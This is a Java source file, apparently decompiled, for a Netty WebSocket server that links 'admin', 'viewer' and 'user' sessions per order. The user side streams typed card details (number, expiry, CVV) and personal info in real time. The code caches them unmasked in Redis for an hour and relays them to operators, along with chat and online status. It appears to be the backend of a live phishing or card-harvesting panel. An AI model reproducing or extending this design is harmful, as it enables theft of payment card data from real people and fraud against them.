package com.xingchen.netty.global;

import com.alibaba.fastjson2.JSONObject;
import com.alibaba.fastjson2.JSONReader;
import com.alibaba.fastjson2.JSONWriter;
import com.alibaba.fastjson2.JSONWriter.Feature;
import com.xingchen.netty.auth.UserAuth;
import com.xingchen.netty.auth.UserOrderSocketVo;
import com.xingchen.netty.config.Config;
import com.xingchen.netty.domain.UserInfo;
import com.xingchen.netty.utils.RedisClient;
import com.xingchen.netty.utils.RequestUtil;
import com.xingchen.netty.utils.StringUtils;
import io.netty.channel.Channel;
import io.netty.channel.group.ChannelGroup;
import io.netty.channel.group.ChannelGroupFuture;
import io.netty.channel.group.DefaultChannelGroup;
import io.netty.handler.codec.http.websocketx.TextWebSocketFrame;
import io.netty.util.AttributeKey;
import io.netty.util.concurrent.GlobalEventExecutor;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ConcurrentMap;
import java.util.stream.Collectors;
import java.util.stream.Stream;

public class ChannelSupervise {
   private static ChannelGroup adminGroup;
   private static ChannelGroup viewGroup;
   private static ConcurrentMap<String, Channel> channelMap;
   private static Map<String, Integer> sessionMap;
   private static String count_key;
   private static String session_map;
   public static final String LINE_ORDER_KEY = "line_order_";
   private static String card_cache;
   private static String info_cache;
   private static String option_cache;
   private static String fail_msg_cache;
   private static String chat_cache;
   private static String ex_chat_cache;
   private static String chat_read;

   public static boolean addChannel(Channel channel, String customId, RedisClient redisClient) {
      String type = (String)channel.attr(AttributeKey.valueOf("type")).get();
      if (type.equals("1")) {
         adminGroup.add(channel);
      } else if (type.equals("3")) {
         viewGroup.add(channel);
      }

      channelMap.put(customId, channel);
      sendUpdateStatus(channel, 201, redisClient);
      return true;
   }

   public static boolean removeChannel(Channel channel, RedisClient redisClient) {
      String type = (String)channel.attr(AttributeKey.valueOf("type")).get();
      if (type.equals("1")) {
         adminGroup.remove(channel);
      } else if (type.equals("3")) {
         viewGroup.remove(channel);
      }

      Iterator var3 = channelMap.entrySet().iterator();

      while(var3.hasNext()) {
         Map.Entry<String, Channel> entry = (Map.Entry)var3.next();
         if (((Channel)entry.getValue()).equals(channel)) {
            channelMap.remove(entry.getKey());
            break;
         }
      }

      sendUpdateStatus(channel, 206, redisClient);
      return true;
   }

   public static Channel findChannel(String id) {
      return (Channel)channelMap.get(id);
   }

   public static boolean send(String cid, TextWebSocketFrame tws) {
      Channel channel = findChannel(cid);
      if (channel != null) {
         channel.writeAndFlush(tws);
         return true;
      } else {
         return false;
      }
   }

   public static void sendUpdateStatus(Channel channel, Integer type, RedisClient redisClient) {
      String userType = (String)channel.attr(AttributeKey.valueOf("type")).get();
      String key = (String)channel.attr(AttributeKey.valueOf("key")).get();
      String[] arr = key.split(":");
      JSONObject params = new JSONObject();
      JSONObject data = new JSONObject();
      String adminId = "";
      String adminToken;
      if (userType.equals("1")) {
         if (type == 201) {
            type = 301;
         }

         if (type == 206) {
            type = 306;
         }

         adminToken = arr[1];
         adminId = arr[0];
         if (adminToken.contains("_view")) {
            return;
         }

         params.fluentPut("type", type).fluentPut("token", adminToken);
      } else if (userType.equals("2")) {
         Integer orderId = (Integer)channel.attr(AttributeKey.valueOf("orderId")).get();
         String sessionId = arr[0];
         adminId = arr[1];
         if (type == 201) {
            if (!redisClient.doesKeyExistInMap(adminId + session_map, sessionId)) {
               redisClient.setMapEntry(adminId + session_map, sessionId, sessionId);
               redisClient.increment(adminId + count_key);
            }

            redisClient.setValueEx("line_order_" + orderId, sessionId, 10L);
         } else {
            redisClient.delete("line_order_" + orderId);
         }

         params.put("realOrderId", getRealOrder(channel).getId());
         params.fluentPut("type", type).fluentPut("orderId", orderId);
         data.fluentPut("session", sessionId);
      }

      adminToken = adminId + ":";
      long adminNum = channelMap.keySet().stream().filter((tmp) -> {
         return tmp.startsWith(adminToken) && !tmp.contains("_view:");
      }).count();
      String userPre = ":" + adminId + ":";
      long userNum = channelMap.keySet().stream().filter((tmp) -> {
         return tmp.contains(userPre);
      }).count();
      long total = redisClient.getCurrentValue(adminId + count_key);
      params.put("data", data.fluentPut("admin_total", adminNum).fluentPut("member_total", userNum).fluentPut("total", total));
      sendToAdminOrUser(redisClient, channel, params.toJSONString(new JSONWriter.Feature[0]), true, true);
   }

   public static void sendToAdminOrUser(RedisClient redisClient, Channel channel, String params, Boolean toAdmin, Boolean online) {
      String type = (String)channel.attr(AttributeKey.valueOf("type")).get();
      String key = (String)channel.attr(AttributeKey.valueOf("key")).get();
      Stream var10000;
      if (key == null) {
         var10000 = null;
      } else {
         key.split(":");
      }

      Set<String> pres = new HashSet();
      Integer orderId = null;
      Boolean viewAll = Boolean.FALSE;
      JSONObject json;
      String userId;
      if (type.equals("0")) {
         json = JSONObject.parseObject(params);
         if (params.contains("logout")) {
            pres.add(json.getInteger("adminId") + ":");
         } else {
            userId = json.getJSONObject("data").getString("session");
            UserInfo userInfo = (new UserAuth()).getUserInfo(userId);
            if (userInfo == null) {
               return;
            }

            params = json.fluentPut("orderId", userInfo.getFloodId()).fluentPut("backSend", 1).toJSONString(new JSONWriter.Feature[0]);
            pres.add("1:");
            orderId = userInfo.getFloodId();
            UserOrderSocketVo order = getRealOrder(orderId);
            pres.addAll(order.getViewIdListPre());
            viewAll = order.getViewAll();
         }
      }

      if (type.equals("1")) {
         if (toAdmin) {
            pres.add("1:");
            orderId = JSONObject.parseObject(params).getInteger("orderId");
            if (orderId != null) {
               UserOrderSocketVo order = getRealOrder(orderId);
               pres.addAll(order.getViewIdListPre());
               viewAll = order.getViewAll();
            }
         } else {
            try {
               json = JSONObject.parseObject(params).getJSONObject("data");
               userId = json.getString("sessionId");
               orderId = json.getInteger("orderId");
               pres.add(userId + ":");
            } catch (Exception var16) {
               return;
            }
         }
      }

      if (type.equals("2")) {
         pres.add("1:");
         orderId = (Integer)channel.attr(AttributeKey.valueOf("orderId")).get();
         json = JSONObject.parseObject(params);
         params = json.fluentPut("orderId", orderId).toJSONString(new JSONWriter.Feature[0]);
         if (params.contains("CardInput")) {
            json.put("@class", "java.lang.Object");
            JSONObject card = json.getJSONObject("data").getJSONObject("CardInput");
            if (StringUtils.isEmpty(card.getString("number")) && StringUtils.isEmpty(card.getString("expiry")) && StringUtils.isEmpty(card.getString("cvv"))) {
               redisClient.delete(card_cache + orderId);
            } else {
               redisClient.setValueEx(card_cache + orderId, json.toJSONString(new JSONWriter.Feature[0]), 3600L);
            }
         }

         if (params.contains("InfoInput")) {
            json.put("@class", "java.lang.Object");
            redisClient.setValueEx(info_cache + orderId, json.toJSONString(new JSONWriter.Feature[0]), 3600L);
            return;
         }

         if (params.contains("UserOption")) {
            json.put("@class", "java.lang.Object");
            redisClient.setValueEx(option_cache + orderId, json.toJSONString(new JSONWriter.Feature[0]), 3600L);
         }

         UserOrderSocketVo order = getRealOrder(channel);
         pres.addAll(order.getViewIdListPre());
         viewAll = order.getViewAll();
         params = json.fluentPut("realOrderId", order.getId()).toJSONString(new JSONWriter.Feature[0]);
      }

      TextWebSocketFrame tws = new TextWebSocketFrame(params);
      if (pres.contains("1:")) {
         sendAllView(params);
      }

      if (viewAll) {
         sendAllAdmin(tws);
      } else {
         ChannelGroup channelGroup = new DefaultChannelGroup(GlobalEventExecutor.INSTANCE);
         Iterator var22 = channelMap.keySet().iterator();

         while(var22.hasNext()) {
            String tmpKey = (String)var22.next();
            if (!Objects.equals(tmpKey, key)) {
               var10000 = pres.stream();
               Objects.requireNonNull(tmpKey);
               if (var10000.anyMatch(tmpKey::startsWith)) {
                  Channel curChannel = findChannel(tmpKey);
                  channelGroup.add(curChannel);
               }
            }
         }

         if (!channelGroup.isEmpty()) {
            ChannelGroupFuture future = channelGroup.writeAndFlush(tws);
            future.addListener((future1) -> {
               if (future1.isSuccess()) {
                  channelGroup.close();
               } else {
                  future1.cause().printStackTrace();
                  channelGroup.close();
               }

            });
         }

      }
   }

   public static void sendChatMessage(RedisClient redisClient, Channel channel, String params) {
      String type = (String)channel.attr(AttributeKey.valueOf("type")).get();
      String key = (String)channel.attr(AttributeKey.valueOf("key")).get();
      Stream var10000;
      if (key == null) {
         var10000 = null;
      } else {
         key.split(":");
      }

      Set<String> pres = new HashSet();
      Integer orderId = null;
      JSONObject msg = JSONObject.parseObject(params);
      msg.put("type", type);
      msg.put("option", "chatMessage");
      msg.put("time", System.currentTimeMillis());
      if (type.equals("1")) {
         try {
            String userId = msg.getJSONObject("data").getString("sessionId");
            orderId = msg.getJSONObject("data").getInteger("orderId");
            pres.add(userId + ":");
            pres.add("1:");
         } catch (Exception var16) {
            TextWebSocketFrame tws = new TextWebSocketFrame("发送失败，消息数据格式有误");
            channel.writeAndFlush(tws);
            return;
         }
      }

      if (type.equals("2")) {
         pres.add("1:");
         orderId = (Integer)channel.attr(AttributeKey.valueOf("orderId")).get();
      }

      if (orderId == null) {
         TextWebSocketFrame tws = new TextWebSocketFrame("发送失败，订单ID不能为空");
         channel.writeAndFlush(tws);
      } else {
         msg.put("orderId", orderId);
         redisClient.addToList(chat_cache + orderId, msg.toJSONString(new JSONWriter.Feature[0]), 1800L);
         long num = redisClient.increment(chat_read + orderId, 1800L);
         msg.put("noRead", num);
         ChannelGroup channelGroup = new DefaultChannelGroup(GlobalEventExecutor.INSTANCE);
         UserOrderSocketVo order = getRealOrder(orderId);
         pres.addAll(order.getViewIdListPre());
         if (order.getViewAll()) {
            channelGroup.addAll(adminGroup);
         }

         Iterator var13 = channelMap.keySet().iterator();

         while(var13.hasNext()) {
            String tmpKey = (String)var13.next();
            var10000 = pres.stream();
            Objects.requireNonNull(tmpKey);
            if (var10000.anyMatch(tmpKey::startsWith)) {
               Channel curChannel = findChannel(tmpKey);
               channelGroup.add(curChannel);
            }
         }

         if (!channelGroup.isEmpty()) {
            TextWebSocketFrame tws = new TextWebSocketFrame(msg.toJSONString(new JSONWriter.Feature[0]));
            ChannelGroupFuture future = channelGroup.writeAndFlush(tws);
            future.addListener((future1) -> {
               if (future1.isSuccess()) {
                  channelGroup.close();
               } else {
                  future1.cause().printStackTrace();
                  channelGroup.close();
               }

            });
         }

      }
   }

   public static void getChatList(RedisClient redisClient, Channel channel) {
      String type = (String)channel.attr(AttributeKey.valueOf("type")).get();
      String key = (String)channel.attr(AttributeKey.valueOf("key")).get();
      String[] arr = key == null ? null : key.split(":");
      JSONObject params = (new JSONObject()).fluentPut("option", "getChatList");
      List<JSONObject> list = new ArrayList();
      if (type.equals("1")) {
         Set<String> sets = redisClient.keys(chat_cache + "*");
         if (!sets.isEmpty()) {
            sets.forEach((chatKey) -> {
               JSONObject json = new JSONObject();
               String orderId = chatKey.replace(chat_cache, "");
               UserOrderSocketVo order = getRealOrder(Integer.parseInt(orderId));
               if (arr == null || Objects.equals(arr[0], "1") || order.getViewIdList().contains(arr[0]) || order.getViewAll()) {
                  json.put("orderId", Integer.parseInt(orderId));
                  List<String> messages = redisClient.getLists(chatKey, 0, 0);
                  if (messages != null && !messages.isEmpty()) {
                     JSONObject msg = JSONObject.parseObject((String)messages.get(0));
                     json.put("first", msg);
                     json.put("lastTime", msg.getLongValue("time"));
                  }

                  json.put("online", redisClient.exists("line_order_" + orderId));
                  long num = redisClient.getCurrentValue(chat_read + orderId);
                  json.put("noRead", num);
                  list.add(json);
               }
            });
         }
      }

      params.put("data", list);
      TextWebSocketFrame tws = new TextWebSocketFrame(params.toJSONString(new JSONWriter.Feature[0]));
      channel.writeAndFlush(tws);
   }

   public static void getChatDetail(RedisClient redisClient, Channel channel, String params) {
      String type = (String)channel.attr(AttributeKey.valueOf("type")).get();
      String key = (String)channel.attr(AttributeKey.valueOf("key")).get();
      String[] arr = key == null ? null : key.split(":");
      JSONObject json = (new JSONObject()).fluentPut("option", "getChatDetail");
      Integer orderId = null;
      Boolean online = Boolean.FALSE;
      if (type.equals("1")) {
         orderId = JSONObject.parseObject(params).getJSONObject("data").getInteger("orderId");
         online = redisClient.exists("line_order_" + orderId);
      } else if (type.equals("2")) {
         orderId = (Integer)channel.attr(AttributeKey.valueOf("orderId")).get();
         String pre = arr[1] + ":";
         Iterator var10 = channelMap.keySet().iterator();

         while(var10.hasNext()) {
            String tmpKey = (String)var10.next();
            if (tmpKey.startsWith(pre)) {
               online = Boolean.TRUE;
               break;
            }
         }
      }

      if (orderId != null) {
         List<String> list = redisClient.getLists(chat_cache + orderId, 0, -1);
         long num = redisClient.getCurrentValue(chat_read + orderId);
         json.put("noRead", num);
         redisClient.delete(chat_read + orderId);
         json.put("data", list);
         json.put("online", online);
         TextWebSocketFrame tws = new TextWebSocketFrame(json.toJSONString(new JSONWriter.Feature[0]));
         channel.writeAndFlush(tws);
      }
   }

   public static void removeChat(RedisClient redisClient, Channel channel, String params) {
      String type = (String)channel.attr(AttributeKey.valueOf("type")).get();
      if (type.equals("1")) {
         Integer orderId = JSONObject.parseObject(params).getJSONObject("data").getInteger("orderId");
         if (orderId != null) {
            String chatKey = chat_cache + orderId;
            List<String> list = redisClient.getLists(chatKey, 0, -1);
            if (!list.isEmpty()) {
               String tmpKey = ex_chat_cache + orderId + "_" + System.currentTimeMillis();
               list.forEach((item) -> {
                  redisClient.addToList(tmpKey, item, 7200L);
               });
            }

            redisClient.delete(chatKey);
            redisClient.delete(chat_read + orderId);
         }
      }

   }

   public static void removeChatAll(RedisClient redisClient, Channel channel) {
      String type = (String)channel.attr(AttributeKey.valueOf("type")).get();
      if (type.equals("1")) {
         redisClient.keys(chat_cache + "*");
         Set<String> sets = redisClient.keys(chat_cache + "*");
         if (!sets.isEmpty()) {
            sets.forEach((chatKey) -> {
               String orderId = chatKey.replace(card_cache, "");
               List<String> list = redisClient.getLists(chatKey, 0, -1);
               if (!list.isEmpty()) {
                  String tmpKey = ex_chat_cache + orderId + "_" + System.currentTimeMillis();
                  list.forEach((item) -> {
                     redisClient.addToList(tmpKey, item, 7200L);
                  });
               }

               redisClient.delete(chatKey);
               redisClient.delete(chat_read + orderId);
            });
         }
      }

   }

   public static void userStatus(RedisClient redisClient, Channel channel) {
      String userType = (String)channel.attr(AttributeKey.valueOf("type")).get();
      String key = (String)channel.attr(AttributeKey.valueOf("key")).get();
      String[] arr = key.split(":");
      if (userType.equals("2")) {
         Integer orderId = (Integer)channel.attr(AttributeKey.valueOf("orderId")).get();
         String sessionId = arr[0];
         redisClient.setValueEx("line_order_" + orderId, sessionId, 10L);
      }

   }

   public static boolean updateUserStatus(Channel channel, Integer type) {
      try {
         String userType = (String)channel.attr(AttributeKey.valueOf("type")).get();
         String key = (String)channel.attr(AttributeKey.valueOf("key")).get();
         if (userType.equals("2")) {
            String adminId = key.split(":")[1] + ":";
            List<String> keys = (List)channelMap.keySet().stream().filter((tmp) -> {
               return tmp.startsWith(adminId);
            }).collect(Collectors.toList());
            if (!keys.isEmpty()) {
               Map<String, String> header = new HashMap();
               header.put("Like-Admin", ((String)keys.get(0)).split(":")[1]);
               JSONObject params = (new JSONObject()).fluentPut("sessionId", key.split(":")[0]);
               if (type == 201) {
                  params.put("expireTime", 0);
               } else if (type == 206) {
                  params.put("expireTime", String.valueOf(System.currentTimeMillis()).substring(0, 10));
               }

               String str = (new RequestUtil()).doPostJson(Config.sync_client_url + "/api/order/down", params.toJSONString(new JSONWriter.Feature[]{Feature.WriteMapNullValue}), header);
               return true;
            }
         }
      } catch (Exception var9) {
      }

      return false;
   }

   public static void updateAdminNum(Channel channel, RedisClient redisClient) {
      String userType = (String)channel.attr(AttributeKey.valueOf("type")).get();
      String key = (String)channel.attr(AttributeKey.valueOf("key")).get();
      String adminId = key.split(":")[0];
      String adminPre = adminId + ":";
      long adminNum = channelMap.keySet().stream().filter((tmp) -> {
         return tmp.startsWith(adminPre) && !tmp.contains("_view:");
      }).count();
      String userPre = ":" + adminId + ":";
      long userNum = channelMap.keySet().stream().filter((tmp) -> {
         return tmp.contains(userPre);
      }).count();
      long total = redisClient.getCurrentValue(adminId + count_key);
      JSONObject params = (new JSONObject()).fluentPut("type", 10001);
      params.put("data", (new JSONObject()).fluentPut("admin_total", adminNum).fluentPut("member_total", userNum).fluentPut("total", total));
      TextWebSocketFrame tws = new TextWebSocketFrame(params.toJSONString(new JSONWriter.Feature[0]));
      channel.writeAndFlush(tws);
   }

   public static void sendUserCache(Channel channel, RedisClient redisClient, Integer orderId) {
      JSONObject params = (new JSONObject()).fluentPut("type", 50005);
      params.put("cardCache", redisClient.getValue(card_cache + orderId));
      params.put("infoCache", redisClient.getValue(info_cache + orderId));
      TextWebSocketFrame tws = new TextWebSocketFrame(params.toJSONString(new JSONWriter.Feature[0]));
      channel.writeAndFlush(tws);
   }

   public static void cleanAdminNum(Channel channel, RedisClient redisClient) {
      String type = (String)channel.attr(AttributeKey.valueOf("type")).get();
      String key = (String)channel.attr(AttributeKey.valueOf("key")).get();
      if (type.equals("1")) {
         String adminId = key.split(":")[0];
         redisClient.delete(adminId + session_map);
         redisClient.delete(adminId + count_key);
      }

   }

   public static UserOrderSocketVo getRealOrder(Channel channel) {
      UserOrderSocketVo realOrder = (UserOrderSocketVo)channel.attr(AttributeKey.valueOf("realOrder")).get();
      if (realOrder != null) {
         return realOrder;
      } else {
         Integer floodId = (Integer)channel.attr(AttributeKey.valueOf("orderId")).get();
         realOrder = getRealOrder(floodId);
         if (realOrder.getId() != null) {
            channel.attr(AttributeKey.valueOf("realOrder")).set(realOrder);
         }

         return realOrder;
      }
   }

   public static UserOrderSocketVo getRealOrder(Integer floodId) {
      long time = System.currentTimeMillis();
      UserOrderSocketVo realOrder = null;
      Map<String, String> map = new HashMap();
      map.put("floodId", floodId + "");
      String str = (new RequestUtil()).doGetToParams(Config.sync_client_url + "/api/order/getSocketOrder", map);

      try {
         realOrder = (UserOrderSocketVo)JSONObject.parseObject(str).getObject("data", UserOrderSocketVo.class, new JSONReader.Feature[0]);
      } catch (Exception var8) {
      }

      long end = System.currentTimeMillis() - time;
      System.out.println("查询真实订单耗时：" + end);
      if (realOrder == null) {
         realOrder = new UserOrderSocketVo();
      }

      if (StringUtils.isNotEmpty(realOrder.getViewIds())) {
         realOrder.setViewIdList(new HashSet(Arrays.asList(realOrder.getViewIds().split(","))));
         realOrder.setViewIdListPre((Set)Arrays.stream(realOrder.getViewIds().split(",")).map((tmp) -> {
            return tmp + ":";
         }).collect(Collectors.toSet()));
      } else {
         realOrder.setViewIdList(Collections.EMPTY_SET);
         realOrder.setViewIdListPre(Collections.EMPTY_SET);
      }

      return realOrder;
   }

   public static boolean sendAllAdmin(TextWebSocketFrame tws) {
      adminGroup.writeAndFlush(tws);
      return true;
   }

   public static boolean sendAllView(String params) {
      if (params.contains("CardInput")) {
         try {
            JSONObject card = JSONObject.parseObject(params);
            JSONObject data = card.getJSONObject("data");
            JSONObject cardInput = data.getJSONObject("CardInput");
            if (cardInput.containsKey("number")) {
               cardInput.put("number", StringUtils.showField(cardInput.getString("number").replace(" ", ""), 6));
            }

            StringUtils.hideField(cardInput, new String[]{"holder", "expiry", "cvv"});
            params = card.fluentPut("data", data.fluentPut("CardInput", cardInput)).toString();
         } catch (Exception var4) {
         }
      }

      TextWebSocketFrame tws = new TextWebSocketFrame(params);
      viewGroup.writeAndFlush(tws);
      return true;
   }

   static {
      adminGroup = new DefaultChannelGroup(GlobalEventExecutor.INSTANCE);
      viewGroup = new DefaultChannelGroup(GlobalEventExecutor.INSTANCE);
      channelMap = new ConcurrentHashMap();
      sessionMap = new HashMap();
      count_key = "_user_count";
      session_map = "_user_session_map";
      card_cache = "card_cache_";
      info_cache = "info_cache_";
      option_cache = "option_cache_";
      fail_msg_cache = "fail_msg_cache_";
      chat_cache = "chat_cache_";
      ex_chat_cache = "ex_chat_cache_";
      chat_read = "chat_read_";
   }
}
